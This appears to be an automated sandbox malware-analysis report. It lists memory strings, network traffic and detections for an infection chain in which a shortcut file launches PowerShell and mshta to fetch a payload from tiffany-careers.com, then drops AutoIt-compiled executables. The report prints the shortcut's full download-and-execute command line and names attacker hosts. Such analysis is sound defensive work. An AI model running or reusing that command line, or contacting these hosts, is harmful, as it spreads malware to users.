Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: powershell.exe, 00000007.00000002.1579505691.000001EE08EC4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftSb
Source: svchost.exe, 00000006.00000002.2648871899.000001F09D000000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000006.00000003.1459048299.000001F09CE20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000007.00000002.1656137707.000001EE1AD23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1958024170.0000026D2DFA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F7BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000007.00000002.1580236263.000001EE0ACB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1DF31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: powershell.exe, 00000007.00000002.1580236263.000001EE0AEDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com
Source: powershell.exe, 00000007.00000002.1580236263.000001EE0B14C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com/BFmcYQ.exep
Source: powershell.exe, 00000007.00000002.1580236263.000001EE0AEDA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tiffany-careers.com/test.pdf
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F7BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Guard.exe, 00000015.00000002.2643185965.0000000000AE9000.00000002.00000001.01000000.0000000F.sdmp, Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif, 0000001B.00000000.1906525938.0000000000FD9000.00000002.00000001.01000000.00000011.sdmp, SwiftWrite.pif.21.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: powershell.exe, 00000007.00000002.1580236263.000001EE0ACB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1DF31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000006.00000003.1459048299.000001F09CE79000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
Source: svchost.exe, 00000006.00000003.1459048299.000001F09CE20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F7BB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F076000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: mshta.exe, 00000004.00000003.1707086050.000002C2C9724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720378439.000002C2C9727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: powershell.exe, 00000007.00000002.1656137707.000001EE1AD23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1958024170.0000026D2DFA8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.1778186746.0000026D1F841000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000013.00000002.1778186746.0000026D1F593000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: mshta.exe, 00000004.00000002.1720378439.000002C2C9727000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/
Source: mshta.exe, 00000004.00000002.1722599843.000002CAD1440000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720205702.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719416835.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714521207.000002CACB972000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720006678.000002C2C9680000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707699079.000002CAD110C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemo
Source: powershell.exeString found in binary or memory: https://tiffany-careers.com/duydemo$global:?
Source: mshta.exe, 00000004.00000002.1720205702.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719416835.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemo(
Source: mshta.exe, 00000004.00000002.1720950548.000002CACB946000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemo...
Source: mshta.exe, 00000004.00000002.1720950548.000002CACB930000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemo...6f-
Source: mshta.exe, 00000004.00000003.1712666267.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714778759.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720281906.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719158237.000002C2C9706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemo6
Source: forfiles.exe, 00000001.00000002.1425154635.000002138F260000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemo=C:
Source: forfiles.exe, 00000001.00000002.1425075310.000002138F050000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707086050.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720495666.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1715474320.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719251921.000002C2C9760000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720148189.000002C2C9690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemoC:
Source: mshta.exe, 00000004.00000002.1720650071.000002C2CAF70000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemoH
Source: mshta.exe, 00000004.00000002.1722445350.000002CAD110C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1713934465.000002CAD110C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1718694707.000002CAD110C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1707699079.000002CAD110C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemoLMEMH
Source: s4PymYGgSh.lnkString found in binary or memory: https://tiffany-careers.com/duydemoOC:
Source: mshta.exe, 00000004.00000002.1720205702.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719416835.000002C2C96B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemoT
Source: mshta.exe, 00000004.00000003.1712666267.000002C2C96CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemoTTC:
Source: mshta.exe, 00000004.00000003.1716370101.000002CACF945000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemohttps://tiffany-careers.com/duydemoP&
Source: mshta.exe, 00000004.00000002.1720006678.000002C2C9680000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemorDataFPS_BROW
Source: forfiles.exe, 00000001.00000002.1425075310.000002138F050000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemos
Source: mshta.exe, 00000004.00000003.1712666267.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1714778759.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.1720281906.000002C2C9706000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.1719158237.000002C2C9706000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://tiffany-careers.com/duydemoy.
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: https://www.autoitscript.com/autoit3/
Source: SwiftWrite.pif.21.drString found in binary or memory: https://www.globalsign.com/repository/0
Source: Guard.exe, 00000015.00000003.1752320141.00000000046B6000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000015.00000002.2651128046.00000000038D2000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.21.drString found in binary or memory: https://www.globalsign.com/repository/06
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownHTTPS traffic detected: 147.45.49.155:443 -> 192.168.2.7:49716 version: TLS 1.2
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,14_2_00007FF74D0C0D24
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C0D24 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,14_2_00007FF74D0C0D24
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A94830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,21_2_00A94830
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F84830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,27_2_00F84830
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C0A6C OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,14_2_00007FF74D0C0A6C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0A8E18 GetParent,GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,PostMessageW,PostMessageW,14_2_00007FF74D0A8E18
Source: C:\Users\Public\Guard.exeCode function: 21_2_00AAD164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,21_2_00AAD164
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F9D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,27_2_00F9D164

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 8128, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Binary is likely a compiled AutoIt script file
Source: powershell.exe, 00000007.00000002.1656137707.000001EE1AF23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_10ad10bb-4
Source: powershell.exe, 00000007.00000002.1656137707.000001EE1AF23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_a5cbcc0f-a
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: This is a third-party compiled AutoIt script.14_2_00007FF74D0337B0
Source: BFmcYQ.exeString found in binary or memory: This is a third-party compiled AutoIt script.
Source: BFmcYQ.exe, 0000000E.00000000.1574664212.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_bb14724d-a
Source: BFmcYQ.exe, 0000000E.00000000.1574664212.00007FF74D108000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_f08dc3fb-5
Source: BFmcYQ.exe.7.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e169e38a-b
Source: BFmcYQ.exe.7.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer@*memstr_ff1ccbeb-2
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\Guard.exeJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\BFmcYQ.exeJump to dropped file
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Windows shortcut file (LNK) contains suspicious command line arguments
Source: s4PymYGgSh.lnkLNK file: /p C:\Windows\System32 /m cmmon32.exe /c "powershell . \*i*\*2\msh*e https://tiffany-careers.com/duydemo
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B3E20: GetFullPathNameW,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,14_2_00007FF74D0B3E20
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D09CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,14_2_00007FF74D09CE68
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0AD750 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,14_2_00007FF74D0AD750
Source: C:\Users\Public\Guard.exeCode function: 21_2_00A85778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,21_2_00A85778
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 27_2_00F75778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,27_2_00F75778
Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmpJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB0C6C6B7_2_00007FFAAB0C6C6B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFAAB0C64D37_2_00007FFAAB0C64D3
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0CF63014_2_00007FF74D0CF630
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D042E3014_2_00007FF74D042E30
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D040E7014_2_00007FF74D040E70
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0DCE8C14_2_00007FF74D0DCE8C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D050E9014_2_00007FF74D050E90
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D072D2014_2_00007FF74D072D20
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D076DE414_2_00007FF74D076DE4
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0630DC14_2_00007FF74D0630DC
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0D0AEC14_2_00007FF74D0D0AEC
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D032AE014_2_00007FF74D032AE0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C6C3414_2_00007FF74D0C6C34
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0DC6D414_2_00007FF74D0DC6D4
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0D055C14_2_00007FF74D0D055C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0DA59C14_2_00007FF74D0DA59C
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D06A8A014_2_00007FF74D06A8A0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0767F014_2_00007FF74D0767F0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0502C414_2_00007FF74D0502C4
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D05C13014_2_00007FF74D05C130
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0684C014_2_00007FF74D0684C0
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D05451414_2_00007FF74D054514
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C632014_2_00007FF74D0C6320
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0C836014_2_00007FF74D0C8360
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D0B83D414_2_00007FF74D0B83D4
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D05C3FC14_2_00007FF74D05C3FC
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D07240014_2_00007FF74D072400
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D03BE7014_2_00007FF74D03BE70
Source: C:\Users\user\AppData\Roaming\BFmcYQ.exeCode function: 14_2_00007FF74D05BEB414_2_00007FF74D05BEB4
